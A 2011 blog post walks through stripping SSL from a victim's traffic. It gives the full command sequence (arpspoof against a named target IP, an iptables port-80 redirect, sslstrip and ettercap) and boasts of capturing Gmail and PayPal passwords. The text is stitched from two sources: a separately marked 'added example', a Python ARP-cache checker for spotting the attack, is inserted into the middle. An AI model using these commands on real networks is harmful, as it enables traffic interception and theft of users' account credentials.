Friday, January 21, 2011

Stripping SSL & Sniffing HTTPS (SSLStrip)



Links

Watch video on-line: http://g0tmi1k.blip.tv/file/2345515

Download video: http://www.mediafire.com/?o4ihmqyxwgz

Commands: http://pastebin.com/q6MY3v6L

What is this?


This video shows that SSL encryption on its own does not guarantee a secure session. As proof, the passwords for a web-based email account (Google Mail) and an online bank (PayPal) are captured and shown.


How does this work?

> A 'Man In The Middle' attack is performed, so all of the target's traffic flows through the attacker.

> HTTP traffic on port 80 is picked out and then redirected / forwarded to a different port.

> SSLStrip listens on that port and removes the SSL connection before passing the traffic back to the user.

> ettercap then picks out the username & password.
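
The man-in-the-middle step above leaves a visible trace in the target's ARP cache: the gateway's IP resolves to the attacker's MAC address. The following is an added example, not part of the original post, that checks a table in Linux /proc/net/arp format for that symptom; the gateway IP comes from this page's network setup, while the MAC addresses, the other hosts and the function names are constructed for illustration.

```python
# Added example: spot the ARP-cache symptom of the MITM step on the target.
INCOMPLETE = "00:00:00:00:00:00"  # shown by the kernel for unresolved entries

# Constructed samples in Linux /proc/net/arp format. MAC addresses and the
# 192.168.1.7 / 192.168.1.20 hosts are invented for illustration.
HEADER = "IP address       HW type     Flags       HW address            Mask     Device\n"
CLEAN = HEADER + (
    "192.168.1.1      0x1         0x2         00:11:22:33:44:55     *        wlan0\n"
    "192.168.1.7      0x1         0x2         66:77:88:99:aa:bb     *        wlan0\n"
    "192.168.1.20     0x1         0x0         00:00:00:00:00:00     *        wlan0\n"
)
POISONED = HEADER + (
    "192.168.1.1      0x1         0x2         66:77:88:99:aa:bb     *        wlan0\n"
    "192.168.1.7      0x1         0x2         66:77:88:99:aa:bb     *        wlan0\n"
)


def parse_arp_table(text):
    """Return {ip: mac} for resolved entries, with MACs lower-cased."""
    entries = {}
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 6:
            continue                            # blank or truncated line
        ip, mac = fields[0], fields[3].lower()
        if mac != INCOMPLETE:                   # unresolved entry carries no signal
            entries[ip] = mac
    return entries


def check_gateway(text, gateway_ip, known_good_mac=None):
    """Return a list of findings; an empty list means nothing suspicious."""
    table = parse_arp_table(text)
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return ["gateway %s has no resolved ARP entry" % gateway_ip]
    findings = []
    if known_good_mac and gw_mac != known_good_mac.lower():
        findings.append("gateway MAC is %s, expected %s" % (gw_mac, known_good_mac.lower()))
    sharers = sorted(ip for ip, mac in table.items() if mac == gw_mac and ip != gateway_ip)
    if sharers:
        findings.append("gateway MAC %s also claimed by %s" % (gw_mac, ", ".join(sharers)))
    return findings


if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("poisoned", POISONED)):
        print(name, check_gateway(sample, "192.168.1.1", "00:11:22:33:44:55"))
```

The shared-MAC check only fires when the other host's real address is also in the cache, so the comparison against a MAC recorded while the network was known to be clean is the more reliable of the two signals.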

What do I need?


> sslstrip

> arpspoof

> ettercap

*all in BackTrack 4 Pre Final*

Network Setup:

Target's IP: 192.168.1.6

Gateway: 192.168.1.1


Software

Name: sslstrip

Version: 0.2

Home Page: http://www.thoughtcrime.org/software...rip/index.html

Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz

Name: arpspoof (DSniff)

Version: 2.3

Home Page: http://www.monkey.org/~dugsong/dsniff/

Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz


Name: ettercap

Version: 0.7.3

Home Page: http://ettercap.sourceforge.net

Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download


Commands:

Code:
kate /etc/etter.conf
# uncomment redir_command_off in the iptables, linux section
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i wlan0





Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1659.htm?highlight=


 thanks ~g0tmi1k
